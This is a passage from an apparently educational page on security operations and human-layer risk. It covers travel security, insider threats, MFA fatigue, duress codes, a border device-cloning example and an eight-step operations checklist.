Employees traveling to high-risk countries face threats including device seizure at borders (customs inspection authority), hotel room compromise, public Wi-Fi interception, and physical surveillance. Mitigation: travel-specific “clean” devices with minimum data, VPN for all internet access, encrypted communications, pre-travel security briefing, and in-country emergency contacts.

Insider threat

Employees, contractors, and former staff with authorized access who misuse it — either maliciously or negligently. Detection signals: excessive data access or downloading, access outside normal hours or from unusual locations, policy violations, behavioral changes (financial stress, grievance), and access to systems unrelated to current role. UEBA and DLP are primary technical controls.

MFA / 2FA fatigue

Social engineering technique where attackers send repeated MFA push notifications until the fatigued user approves one. Training must address: how to recognize fatigue attacks, to never approve an unexpected MFA push, to immediately report unexpected MFA notifications, and how to use number matching and additional context features that defeat fatigue attacks.

Emergency management

Personnel safety protocols for physical emergencies — fire evacuation, active threat response, medical emergencies. Security operations must integrate with physical safety: an active shooter scenario requires immediate lockdown of physical access systems; a fire evacuation must include secure laptop removal procedures for sensitive data environments.

Duress procedures

A duress code or duress PIN allows a person being coerced (forced at gunpoint to unlock a system or grant physical access) to signal silently that they are under duress — triggering a security response while appearing to comply. Duress codes must be trained, maintained, and tested — an untrained employee under duress cannot improvise.

🌐 Real-world example — travel security

In 2018, a senior executive at a US aerospace company traveled to China for business negotiations. Chinese customs officials required the executive to unlock their laptop and phone at the border — a legal requirement that companies must prepare for. Analysis later found the devices had been cloned. The data exfiltrated included not just the executive’s files but the VPN configuration, cached credentials, and email content — which provided access to the company’s internal network after the executive returned. The company had no travel security program, no clean travel devices, and had not briefed the executive on border crossing risks. Organizations operating in jurisdictions with mandatory device inspection must treat all returning travel devices as potentially compromised and require re-enrollment before network access.

Security awareness is not a training event — it is an ongoing culture. One annual CBT course does not change behavior. Monthly simulations, short-form communications, security champions who reinforce messages in team contexts, and a culture where reporting suspected security issues is rewarded (not punished) are the elements of a program that actually reduces human-layer risk over time.

The security operations chain

Every gap in this chain is where an attacker persists longer, moves further, causes more damage, or recovers faster than the organization does.

1

Collect evidence properly before you need it

Chain of custody, order of volatility, forensic imaging. Evidence collected incorrectly before a crisis cannot be fixed after it.

Gap: inadmissible evidence
2

Log everything relevant, monitor it continuously

SIEM with complete log coverage, tuned detection rules, UEBA for behavioral anomalies, threat hunting for what rules miss. Visibility is the prerequisite for detection.

Gap: blind spots in logging
3

Maintain known-good configurations

Baselines, drift detection, IaC for automated consistent deployment. Most breaches begin with a misconfiguration, not a zero-day.

Gap: configuration drift
4

Respond to incidents with a practiced plan

Detect → Respond → Mitigate → Report → Recover → Remediate → Learn. Each phase has defined outputs. Lessons learned must drive action items.

Gap: no IR plan
5

Patch vulnerabilities within risk-based SLAs

Complete asset inventory, continuous scanning, risk-based prioritization, verified remediation. Most exploited vulnerabilities have patches available — apply them.

Gap: patch SLA unmet
6

Control every change to production

CAB review, security sign-off, staged rollout, rollback plan. Most outages and many breaches are caused by uncontrolled changes.

Gap: unauthorized changes
7

Test recovery before you need it

3-2-1-1-0 backups, immutable copies, verified restore tests. Recovery sites tested at the interruption level. Tabletops alone are not enough.

Gap: untested recovery
8

Protect people as well as systems

Travel security, insider threat programs, MFA fatigue training, duress procedures, emergency management. People are the ultimate target of every attack.

Gap: humans as weakest link

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Index